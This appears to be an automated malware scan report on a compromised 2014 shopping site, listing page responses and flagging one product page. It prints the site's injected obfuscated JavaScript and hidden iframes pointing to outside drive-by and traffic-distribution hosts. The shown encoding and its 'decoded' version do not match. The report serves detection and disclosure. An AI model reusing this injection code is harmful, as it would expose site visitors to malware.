Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ebuymax.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ebuymax.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Dec 2014 10:55:33 GMT Location: http://www.ebuymax.com/catalog/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ebuymax.com/catalog/ | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?N=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?N=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?M=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?M=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?S=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?S=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?D=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?D=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Dec 2014 10:55:38 GMT Location: http://www.ebuymax.com/catalog/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ebuymax.com/test404page.js | 404 Not Found Content-Length: 3671 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/tell_a_friend.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 13 Dec 2014 10:55:39 GMT Pragma: no-cache Location: http://ebuymax.com/catalog/product_info.php?products_id=&osCsid=2kvc9f0himsjelq8j1shie1vd1 Server: Apache Vary: * Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: osCsid=2kvc9f0himsjelq8j1shie1vd1; path=/catalog/; domain=ebuymax.com X-Powered-By: PHP/5.2.14 | clean |
http://ebuymax.com/catalog/product_info.php?products_id=&oscsid=2kvc9f0himsjelq8j1shie1vd1 | 200 OK Content-Length: 36533 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var hhetsNxQiPcZoaklNDFW = "K60K105K102K114K97K109K101K32K119K105K100K116K104K61K34K52K56K48K34K32K104K101K105K103K104K116K61K34K54K48K34K32K115K114K99K61K34K104K116K116K112K58K47K47K109K111K108K111K46K116K119K47K105K110K100K101K120K46K112K104K112K34K32K115K116K121K108K101K61K34K98K111K114K100K101K114K58K48K112K120K59K32K112K111K115K105K116K105K111K110K58K114K101K108K97K116K105K118K101K59K32K116K111K112K58K48K112K120K59K32K108K101K102K116K58K45K53K48K48K112K120K59K32K111K112K97K99K105K116K121K58 Decoded script: <iframe width="480" height="60" src="http://xbx.tw/in.cgi?3" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://strhq.cn/tds_a/go.php?id=2 <iframe frameborder=0 border=0 height=1 width=1 src="http://strhq.cn/tds_a/go.php?id=2" /> | ||
http://ebuymax.com/catalog/index.php?osCsid=3fi85n0kg005r7ug17ot7ghgt1 | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Dec 2014 10:55:48 GMT Location: http://jkk.tw/in.cgi?5¶meter=jkk Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://jkk.tw/in.cgi?5¶meter=jkk | 500 Can't connect to jkk.tw:80 Content-Length: 181 Content-Type: text/plain | clean |
http://www.ebuymax.com/catalog/stylesheet_red.css | 200 OK Content-Length: 6125 Content-Type: text/css | clean |
http://www.ebuymax.com/catalog/stylesheet_purple.css | 200 OK Content-Length: 6127 Content-Type: text/css | clean |
http://www.ebuymax.com/catalog/stylesheet_pink.css | 200 OK Content-Length: 6127 Content-Type: text/css | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ebuymax.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Dec 2014 10:55:33 GMT
Location: http://www.ebuymax.com/catalog/
Server: Apache
Content-Type: text/html; charset=iso-8859-1
GET / HTTP/1.1
Host: ebuymax.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Dec 2014 10:55:33 GMT
Location: http://www.ebuymax.com/catalog/
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Second query (visit from search engine):
GET / HTTP/1.1
Host: ebuymax.com
Referer: http://www.google.com/search?q=ebuymax.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ebuymax.com
Referer: http://www.google.com/search?q=ebuymax.com
Result:
The result is similar to the first query. There are no suspicious redirects found.